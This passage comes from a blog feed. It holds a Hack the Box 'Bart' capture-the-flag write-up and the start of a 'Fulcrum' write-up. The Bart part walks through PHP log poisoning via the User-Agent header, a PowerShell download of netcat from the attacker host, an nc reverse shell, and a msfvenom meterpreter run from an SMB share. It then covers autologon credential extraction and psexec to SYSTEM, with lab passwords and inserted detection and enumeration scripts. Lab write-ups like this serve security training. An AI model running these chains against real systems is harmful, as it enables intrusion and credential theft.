&lt;p&gt;While running gobuster &amp;amp; sqlmap in the background, if you do some googling on “simple chat” you will discover the following GitHub repo: &lt;a href=&quot;https://github.com/magkopian/php-ajax-simple-chat&quot;&gt;https://github.com/magkopian/php-ajax-simple-chat&lt;/a&gt;. To validate that these two applications are the same, I inspected the &lt;a href=&quot;https://github.com/magkopian/php-ajax-simple-chat/blob/master/simple_chat/css/chat_global.css&quot;&gt;css/chat_global.css&lt;/a&gt; file and sure enough it was the same application.
Looking at the application’s code we see that there is registration functionality. The application doesn’t directly give you an option to register for an account, but it seems shoddily built, so we can try manually crafting the request to register an account and hope nothing has changed (we know the location and the parameters required to register an account from auditing the register.php source code).&lt;/p&gt;

&lt;p&gt;Sure enough, we are able to register an account with a username:password of &lt;code class=&quot;highlighter-rouge&quot;&gt;medic:medicmedic&lt;/code&gt; on the internal dev chat by crafting our request just right.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/bart/20.png&quot; alt=&quot;&amp;quot;Creating Account on Dev Chat&amp;quot;&quot; title=&quot;Creating Account on Dev Chat&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/bart/13.png&quot; alt=&quot;&amp;quot;Authenticating to Internal Chat&amp;quot;&quot; title=&quot;Authenticating to internal chat&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;getting-rce-through-lfi--log-poisoning&quot;&gt;Getting RCE through LFI &amp;amp; Log Poisoning&lt;/h3&gt;
&lt;p&gt;Clicking the log link will cause two alerts to appear that seemingly do nothing. Inspecting the original application code, there are no references to a “log” functionality, so this must be a third-party modification. After some fiddling &amp;amp; inspecting the request history in Burp Suite, you will see that the application records the username &amp;amp; your User-Agent in a log file, as seen below.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://i.imgur.com/hRS2rqK.png&quot; alt=&quot;&amp;quot;Logged useragent&amp;quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Since we control our User-Agent, and the log page includes the file named by the &lt;code class=&quot;highlighter-rouge&quot;&gt;filename&lt;/code&gt; parameter, we can use this to execute PHP code by visiting the log file page.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;GET //log/log.php?username=harvey&amp;amp;filename=log.php HTTP/1.1

Host: internal-01.bart.htb

User-Agent: &amp;lt;?php exec('whoami'); ?&amp;gt; Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Cookie: PHPSESSID=4o03rnotk1l5b2ols3mkmqm8u9

Connection: close

Upgrade-Insecure-Requests: 1

&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/htb/bart/21.png&quot; alt=&quot;&amp;quot;Code Execution Success&amp;quot;&quot; title=&quot;Code Execution Success&quot; /&gt;&lt;/p&gt;

&lt;p&gt;To speed this up I recommend having 2-3 repeater tabs open. One to input commands into, and one to visit the page to trigger the execution.&lt;/p&gt;
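From the defender's side, both halves of this chain leave a trace in the web server log: the PHP open tag arrives in the User-Agent, and the request that triggers it names a file in the `filename` parameter. The following is an added example, not code from the box or the write-up: a detector that runs over a constructed IIS-style W3C access log (spaces in the User-Agent become `+`, as IIS writes them) and flags both. The field layout, the parameter names in `FILE_PARAMS` and the sample records are assumptions for the example.

```python
"""Spotting PHP log poisoning in IIS W3C access logs.

Added example (not code from the box or the write-up). SAMPLE_LOG is a
constructed W3C-format log; the poisoned record mirrors the request shown
above. The checks look for a PHP open tag in the User-Agent and for a
request parameter that hands the log viewer a script or a path outside
its directory, which are the two halves of the LFI + poisoning chain.
"""
import re
import urllib.parse

# Constructed sample in the shape IIS writes (field list in the header).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2018-07-12 04:00:01 GET /simple_chat/login.php - 10.10.15.171 Mozilla/5.0+(X11;+Linux+x86_64;+rv:52.0)+Gecko/20100101+Firefox/52.0 200
2018-07-12 04:05:12 GET /log/log.php username=harvey&filename=log.php 10.10.15.171 <?php+exec('whoami');+?>+Mozilla/5.0+(X11;+Linux+x86_64) 200
2018-07-12 04:05:40 GET /log/log.php username=harvey&filename=..%2F..%2Fwindows%2Fwin.ini 10.10.15.171 Mozilla/5.0 200
2018-07-12 04:06:02 GET /log/log.php username=harvey&filename=log.txt 10.10.15.171 curl/7.58.0 200
"""

# A PHP open tag: "<?php", the short echo tag "<?=", or "<?" + whitespace.
PHP_TAG = re.compile(r"<\?(php\b|=|\s)", re.IGNORECASE)
# Parameter names that commonly carry a file name into include()/fopen().
# Assumed list for the example; extend it for the application you run.
FILE_PARAMS = {"filename", "file", "page", "include", "path"}


def contains_php_tag(text):
    """True if text holds a PHP open tag, i.e. what a viewer that
    include()s the log would execute. Also usable on the app's own log."""
    return PHP_TAG.search(text) is not None


def parse_w3c(log):
    """Yield (line_no, record dict) for each data line, using the names from
    the most recent #Fields header; malformed lines are skipped."""
    fields = None
    for no, line in enumerate(log.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip() or fields is None:
            continue
        values = line.split(" ")          # W3C fields are space-delimited
        if len(values) != len(fields):
            continue
        yield no, dict(zip(fields, values))


def suspicious_file_param(query):
    """Return the first file-like parameter value that points at a script
    or outside the viewer's directory; None if nothing stands out."""
    if query == "-":                      # IIS writes '-' for no query
        return None
    for key, vals in urllib.parse.parse_qs(query, keep_blank_values=True).items():
        if key.lower() not in FILE_PARAMS:
            continue
        for v in vals:
            if ".." in v or v.startswith(("/", "\\")) or v.lower().endswith(".php"):
                return v
    return None


def find_poisoning(log):
    """Flag records whose User-Agent carries PHP code or whose query names a
    file for the viewer to pull in; returns [(line_no, reason), ...]."""
    findings = []
    for no, rec in parse_w3c(log):
        ua = urllib.parse.unquote(rec.get("cs(User-Agent)", "-").replace("+", " "))
        if contains_php_tag(ua):
            findings.append((no, "php tag in user-agent"))
        bad = suspicious_file_param(rec.get("cs-uri-query", "-"))
        if bad is not None:
            findings.append((no, "file parameter: " + bad))
    return findings


if __name__ == "__main__":
    for line_no, reason in find_poisoning(SAMPLE_LOG):
        print(line_no, reason)
```

The poisoned request shows up twice, once for each half, and that pairing from the same client is the signal worth alerting on; the viewer's normal use (`filename=log.txt` from a browser) is left alone. The same `contains_php_tag` check run over the application's own `log.txt` catches the payload after it has been written, which is the point at which the file becomes executable through the include.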

&lt;p&gt;We upload &amp;amp; execute a 64-bit netcat binary onto the machine (important for later) so we can get an interactive shell.&lt;/p&gt;

&lt;p&gt;I injected the following code into the &lt;code class=&quot;highlighter-rouge&quot;&gt;user agent&lt;/code&gt; field. Make sure you remember to escape the inner &lt;code class=&quot;highlighter-rouge&quot;&gt;&quot;&lt;/code&gt; characters with &lt;code class=&quot;highlighter-rouge&quot;&gt;\&lt;/code&gt;.&lt;/p&gt;

&lt;div class=&quot;language-php highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;cp&quot;&gt;&amp;lt;?php&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;exec&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;powershell -command &lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;(New-Object System.Net.WebClient).DownloadFile('http://10.10.15.171:7777/nc.exe','nc.exe')&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt; &lt;span class=&quot;cp&quot;&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;div class=&quot;language-php highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;cp&quot;&gt;&amp;lt;?php&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;exec&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;nc.exe 10.10.15.171 6667 -e cmd.exe&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt; &lt;span class=&quot;cp&quot;&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;getting shell&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~# ncat -lnvp 6667
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::6667
Ncat: Listening on 0.0.0.0:6667
Ncat: Connection from 10.10.10.81.
Ncat: Connection from 10.10.10.81:49886.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\internal-01\log&amp;gt;dir
 Volume in drive C has no label.
 Volume Serial Number is F84E-9CF7

 Directory of C:\inetpub\wwwroot\internal-01\log

12/07/2018  04:06    &amp;lt;DIR&amp;gt;          .
12/07/2018  04:06    &amp;lt;DIR&amp;gt;          ..
12/07/2018  04:00               101 log.ph
12/07/2018  04:05             2,643 log.php
12/07/2018  04:01               303 log.txt
21/02/2018  20:44    &amp;lt;DIR&amp;gt;          Microsoft
12/07/2018  04:06            59,392 nc.exe
               4 File(s)         62,439 bytes
               3 Dir(s)  15,505,301,504 bytes free

C:\inetpub\wwwroot\internal-01\log&amp;gt;whoami
nt authority\iusr
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;h2 id=&quot;privilege-escalation&quot;&gt;Privilege Escalation&lt;/h2&gt;

&lt;p&gt;Poking around the system you will see that there’s not much going on. It’s a pretty recent build of Windows, so that rules out a good chunk of kernel-based LPE exploits. Poking around the application folders you discover the password for the MySQL database, as seen below. You will realize that this was unhelpful information after attempting to use this password against all the user accounts present on the box.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;C:\inetpub\wwwroot\internal-01\simple_chat\includes&amp;gt;type dbconnect.php
...[snip]...
function db_connect() {
        $con = @mysqli_connect('localhost', 'harvey', '!IC4nB3Th3B3st?', 'internal_chat');
        if ($con === false) {
                return false;
        }

        mysqli_set_charset ($con , 'UTF-8');
        return $con;
}
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;h3 id=&quot;getting-x64-meterpreter-shell--impacket&quot;&gt;Getting x64 meterpreter shell &amp;amp; impacket&lt;/h3&gt;

&lt;p&gt;Let’s generate an x64 meterpreter payload and make an SMB share with &lt;code class=&quot;highlighter-rouge&quot;&gt;impacket&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;generate payload msfvenom&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:/opt/serve/windows/kk# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.171 LPORT=6969 -f exe &amp;gt; 6969.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;impacket-smb share&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:/opt/serve/windows# impacket-smbserver kk kk
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.81,49813)
[*] AUTHENTICATE_MESSAGE (\,BART)
[*] User \BART authenticated successfully
[*] :::00::4141414141414141
[*] AUTHENTICATE_MESSAGE (\,BART)
[*] User \BART authenticated successfully
[*] :::00::4141414141414141
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;setting up multihandler&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;msf &amp;gt; use exploit/multi/handler
msf exploit(multi/handler) &amp;gt; set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD =&amp;gt; windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) &amp;gt; set LHOST tun0
LHOST =&amp;gt; tun0
msf exploit(multi/handler) &amp;gt; set LPORT 6969
LPORT =&amp;gt; 6969
msf exploit(multi/handler) &amp;gt; set ExitonSession False
ExitonSession =&amp;gt; false
msf exploit(multi/handler) &amp;gt; run -j
[*] Exploit running as background job 2.

[*] Started reverse TCP handler on 10.10.15.171:6969
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;&lt;em&gt;executing our payload from the smb share &amp;amp; getting shell&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;C:\inetpub\wwwroot\internal-01\log&amp;gt;\\10.10.15.171\kk\6969.exe
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;session&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;msf exploit(multi/handler) &amp;gt;
[*] Sending stage (206403 bytes) to 10.10.10.81
[*] Meterpreter session 1 opened (10.10.15.171:6969 -&amp;gt; 10.10.10.81:51934) at 2018-07-14 11:44:39 -0400

Active sessions
===============

  Id  Name  Type                     Information               Connection
  --  ----  ----                     -----------               ----------
  1         meterpreter x64/windows  NT AUTHORITY\IUSR @ BART  10.10.15.171:6969 -&amp;gt; 10.10.10.81:51934 (10.10.10.81)

&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;The Meterpreter session will die after some time, and the AV on the system deletes the payload shortly after you execute it from the SMB share. Since the handler is running as a background job with ExitOnSession set to false, you can simply re-execute the payload from the share to get a fresh session.&lt;/p&gt;

&lt;h3 id=&quot;recovering-administrator-autologon-credentials&quot;&gt;Recovering Administrator AutoLogon Credentials&lt;/h3&gt;

&lt;p&gt;At this point I did a good chunk of manual enumeration on the system. After manually performing the standard Windows privilege escalation techniques, you discover that there are credentials stored in the Winlogon autologon registry key. Here are a few resources I feel are pretty decent at explaining what to look for in local Windows privilege escalation: &lt;a href=&quot;http://www.fuzzysecurity.com/tutorials/16.html&quot;&gt;Fuzzy Security - Windows Privilege Escalation Fundamentals&lt;/a&gt;, &lt;a href=&quot;https://pentestlab.blog/2017/04/19/stored-credentials/&quot;&gt;Pentestlab&lt;/a&gt;, and &lt;a href=&quot;https://daya.blog/2018/01/06/windows-privilege-escalation/&quot;&gt;Daya Privilege Escalation&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;For some reason I wasn’t getting the result I wanted when I performed this action with a regular shell. I’m going to investigate this tomorrow.&lt;/p&gt;

&lt;p&gt;It did work from PowerShell, running the following command: &lt;code class=&quot;highlighter-rouge&quot;&gt;Get-ItemProperty -path &quot;HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\&quot;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Since we are already using Metasploit for this box, we can also use the post-exploitation module &lt;code class=&quot;highlighter-rouge&quot;&gt;windows_autologin&lt;/code&gt;, which extracts any autologon credentials from the same registry key.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;msf &amp;gt; use windows/gather/credentials/windows_autologin
msf post(windows/gather/credentials/windows_autologin) &amp;gt; set SESSION 7
SESSION =&amp;gt; 7
msf post(windows/gather/credentials/windows_autologin) &amp;gt; run

[*] Running against BART on session 7
[+] AutoAdminLogon=1, DefaultDomain=DESKTOP-7I3S68E, DefaultUser=Administrator, DefaultPassword=3130438f31186fbaf962f407711faddb
[*] Post module execution completed
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
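&lt;p&gt;As an added example (my own code, not part of the original write-up or of Metasploit), here is a small PowerShell function that performs the same check from the IUSR shell and returns the result as objects. It goes slightly beyond the one-liner above: Winlogon also honours the AltDefault* values, so both sets are checked, and the equivalent reg query for a plain cmd.exe shell is noted in the comments. The function name, parameter, and the assumption that the standard Winlogon key path is in use are mine.&lt;/p&gt;

```powershell
# Added example (editor's own, not code from the original write-up).
# Enumerate Winlogon auto-logon credentials from a low-privileged shell.
# Reads the same key as the Get-ItemProperty one-liner and as Metasploit's
# windows_autologin module, but also checks the AltDefault* values that
# Winlogon honours, and returns objects instead of raw registry output.
function Get-AutoLogonCredential {
    [CmdletBinding()]
    param(
        # Standard Winlogon location (assumed); readable by ordinary users, including IUSR.
        [string]$KeyPath = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    )

    $wl = Get-ItemProperty -Path $KeyPath -ErrorAction Stop

    # Primary and alternate value sets. Each entry names the registry values
    # holding the user, the domain and the clear-text password.
    $sets = @(
        @{ User = 'DefaultUserName';    Domain = 'DefaultDomainName';    Pass = 'DefaultPassword' },
        @{ User = 'AltDefaultUserName'; Domain = 'AltDefaultDomainName'; Pass = 'AltDefaultPassword' }
    )

    foreach ($s in $sets) {
        $passName   = $s.Pass
        $userName   = $s.User
        $domainName = $s.Domain
        $passProp   = $wl.PSObject.Properties[$passName]

        # Only report a set that actually carries a password value.
        if ($null -ne $passProp -and -not [string]::IsNullOrEmpty($passProp.Value)) {
            [PSCustomObject]@{
                AutoAdminLogon = $wl.AutoAdminLogon   # '1' means the automatic logon is active
                Domain         = $wl.$domainName
                UserName       = $wl.$userName
                Password       = $passProp.Value      # stored in clear text by design
                Source         = $passName
            }
        }
    }
}

# Usage from the IUSR shell. From a plain cmd.exe shell the same value can be
# read with:
#   reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
Get-AutoLogonCredential | Format-List
```

&lt;p&gt;One caveat: this only finds passwords that were written to the registry in clear text. If the autologon password was configured with Sysinternals Autologon, it is stored as the &lt;code class=&quot;highlighter-rouge&quot;&gt;DefaultPassword&lt;/code&gt; LSA secret instead, which an IUSR-level shell cannot read; the windows_autologin module reads the same registry values as the function above, which is why it worked here.&lt;/p&gt;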

&lt;h3 id=&quot;getting-system-with-pthpsexec&quot;&gt;Getting System with PTH/PSEXEC&lt;/h3&gt;

&lt;p&gt;Now that we have the Administrator’s credentials, getting SYSTEM should be a snap.&lt;/p&gt;

&lt;p&gt;We can do this with Metasploit’s various &lt;a href=&quot;https://www.toshellandback.com/2017/02/11/psexec/&quot;&gt;psexec&lt;/a&gt; modules. One clarification: the recovered &lt;code class=&quot;highlighter-rouge&quot;&gt;DefaultPassword&lt;/code&gt; is the clear-text autologon password. Its 32 hex characters make it look like an NTLM hash, but psexec treats it as an ordinary password here; the same modules only switch to Pass the Hash when &lt;code class=&quot;highlighter-rouge&quot;&gt;SMBPass&lt;/code&gt; is given as an &lt;code class=&quot;highlighter-rouge&quot;&gt;LM:NTLM&lt;/code&gt; pair. Port 445 is filtered from the outside (our initial nmap scan showed only port 80), so the module cannot reach SMB directly. We add a route to 10.10.10.81 through the IUSR meterpreter session with Metasploit’s &lt;a href=&quot;http://carnal0wnage.attackresearch.com/2007/09/using-metasploit-to-pivot-through.html&quot;&gt;route add&lt;/a&gt; command, so the connection to port 445 is made from the box itself, where the service is listening locally.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;msf&amp;gt; use auxiliary/admin/smb/psexec_command
msf auxiliary(admin/smb/psexec_command) &amp;gt; set SMBUser Administrator
SMBUser =&amp;gt; Administrator
msf auxiliary(admin/smb/psexec_command) &amp;gt; set SMBPass 3130438f31186fbaf962f407711faddb
SMBPass =&amp;gt; 3130438f31186fbaf962f407711faddb
msf auxiliary(admin/smb/psexec_command) &amp;gt; set COMMAND \\\\10.10.15.171\\\kk\\\6969.exe
COMMAND =&amp;gt; \\10.10.15.171\kk\6969.exe
msf auxiliary(admin/smb/psexec_command) &amp;gt; set RHOSTS 10.10.10.81
RHOSTS =&amp;gt; 10.10.10.81
msf auxiliary(admin/smb/psexec_command) &amp;gt; options

Module options (auxiliary/admin/smb/psexec_command):

   Name                  Current Setting                   Required  Description
   ----                  ---------------                   --------  -----------
   COMMAND               \\10.10.15.171\kk\6969.exe        yes       The command you want to execute on the remote host
   RHOSTS                10.10.10.81                       yes       The target address range or CIDR identifier
   RPORT                 445                               yes       The Target port
   SERVICE_DESCRIPTION                                     no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                    no        The service display name
   SERVICE_NAME                                            no        The service name
   SMBDomain             .                                 no        The Windows domain to use for authentication
   SMBPass               3130438f31186fbaf962f407711faddb  no        The password for the specified username
   SMBSHARE              C$                                yes       The name of a writeable share on the server
   SMBUser               Administrator                     no        The username to authenticate as
   THREADS               1                                 yes       The number of concurrent threads
   WINPATH               WINDOWS                           yes       The name of the remote Windows directory
msf auxiliary(admin/smb/psexec_command) &amp;gt; route add 10.10.10.81/32 255.255.255.255 7
[*] Route added
msf auxiliary(admin/smb/psexec_command) &amp;gt; run

[+] 10.10.10.81:445       - Service start timed out, OK if running a command or non-service executable...
[*] 10.10.10.81:445       - checking if the file is unlocked
[*] 10.10.10.81:445       - Unable to get handle: The server responded with error: STATUS_SHARING_VIOLATION (Command=45 WordCount=0)
[-] 10.10.10.81:445       - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 10.10.10.81:445       - Getting the command output...
[*] 10.10.10.81:445       - Command finished with no output
[*] 10.10.10.81:445       - Executing cleanup...
[+] 10.10.10.81:445       - Cleanup was successful
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/smb/psexec_command) &amp;gt;
[*] Sending stage (206403 bytes) to 10.10.10.81
[*] Meterpreter session 8 opened (10.10.15.171:6969 -&amp;gt; 10.10.10.81:49866) at 2018-07-14 01:15:57 -0400


msf auxiliary(admin/smb/psexec_command) &amp;gt; sessions

Active sessions
===============

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  7         meterpreter x64/windows  NT AUTHORITY\IUSR @ BART    10.10.15.171:6969 -&amp;gt; 10.10.10.81:49863 (10.10.10.81)
  8         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ BART  10.10.15.171:6969 -&amp;gt; 10.10.10.81:49866 (10.10.10.81)

msf auxiliary(admin/smb/psexec_command) &amp;gt; sessions -i 8
[*] Starting interaction with 8...
meterpreter &amp;gt; sysinfo
Computer        : BART
OS              : Windows 10 (Build 15063).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter &amp;gt; getuid
Server username: NT AUTHORITY\SYSTEM

&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;That’s all for now. I’m pretty busy with oscp &amp;amp; work so hopefully the next few boxes are machines I already have writeups completed for. I’ll also update this post on how to complete this box without metasploit after I get some sleep.&lt;/p&gt;</content><author><name>A Medic (@OnlyaMedic)</name></author><category term="writeup" /><category term="pentesting" /><category term="hackthebox" /><category term="windows" /><category term="log-posion" /><category term="lfi" /><category term="winlogon" /><category term="pivot" /><category term="oscp-like" /></entry><entry><title type="html">Hack the Box - Fulcrum Write up</title><link href="https://dastinia.io/write-up/hackthebox/2018/06/27/hackthebox-fulcrum-writeup/" rel="alternate" type="text/html" title="Hack the Box - Fulcrum Write up" /><published>2018-06-27T00:00:00-04:00</published><updated>2018-06-27T00:00:00-04:00</updated><id>https://dastinia.io/write-up/hackthebox/2018/06/27/hackthebox-fulcrum-writeup</id><content type="html" xml:base="https://dastinia.io/write-up/hackthebox/2018/06/27/hackthebox-fulcrum-writeup/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;/h2&gt;
&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;https://dastinia.io/assets/images/htb/fulcrum/1.png&quot; alt=&quot;Fulcrum&quot; /&gt;
&lt;/p&gt;

&lt;p&gt;Wew this box had aaaaaaaaaalot of steps. Honestly, I feel like a lot of the difficulty perceived with this box came from the heavy need to use PowerShell. Nonetheless it definitely set the bar as one of the more in-depth challenges because of all the steps required to reach the end goal. The pivoting was a very nice touch, and I wish there were more Hack the Box machines architected in this manner, with multiple machines or networks. I went a little more in-depth with this write-up, and included some fails and rabbit-hole detection techniques.&lt;/p&gt;

&lt;h2 id=&quot;tools-used&quot;&gt;Tools Used&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://nmap.org/&quot;&gt;Nmap&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://portswigger.net/&quot;&gt;BurpSuite&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/OJ/gobuster&quot;&gt;GoBuster&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://nmap.org/ncat/&quot;&gt;Ncat&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Powershell&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/rapid7/metasploit-framework&quot;&gt;Metasploit Framework&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://www.dest-unreach.org/socat/&quot;&gt;socat&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1&quot;&gt;Nishang&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;enumeration&quot;&gt;Enumeration&lt;/h2&gt;
&lt;h3 id=&quot;initial-scanning&quot;&gt;Initial Scanning&lt;/h3&gt;

&lt;p&gt;Like always, let’s begin with an nmap scan against the Fulcrum machine (10.10.10.62).
You need to run a full port scan to ensure you don’t miss the service running on port &lt;em&gt;56423&lt;/em&gt;.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/fulcrum# nmap -T4 -sV -sC -Pn -p- 10.10.10.62 -oA fulcrum_fullscan
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-10 15:16 EDT
Nmap scan report for 10.10.10.62
Host is up (0.16s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE VERSION
4/tcp     open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
22/tcp    open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a8:28:6e:d0:af:ab:46:de:c5:09:3d:76:ad:5a:44:e0 (RSA)
|   256 c1:5c:1d:ea:99:ec:e0:a1:dc:04:c5:5a:ad:50:36:f6 (ECDSA)
|_  256 a5:2f:44:e6:e3:10:cf:f7:db:15:d1:3f:49:21:3a:7b (ED25519)
80/tcp    open  http    nginx 1.10.3 (Ubuntu)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Input string was not in a correct format.
88/tcp    open  http    nginx 1.10.3 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: phpMyAdmin
9999/tcp  open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Login
56423/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-title: Site doesn't have a title (application/json;charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 775.49 seconds
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;h3 id=&quot;enumerating-port-4&quot;&gt;Enumerating Port 4&lt;/h3&gt;
&lt;p&gt;Visiting the web service on port 4 displays an “Under Maintenance” page.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/htb/fulcrum/9.png&quot; alt=&quot;&amp;quot;Under Maintenance&amp;quot;&quot; title=&quot;Under Maintenance&quot; /&gt;&lt;/p&gt;

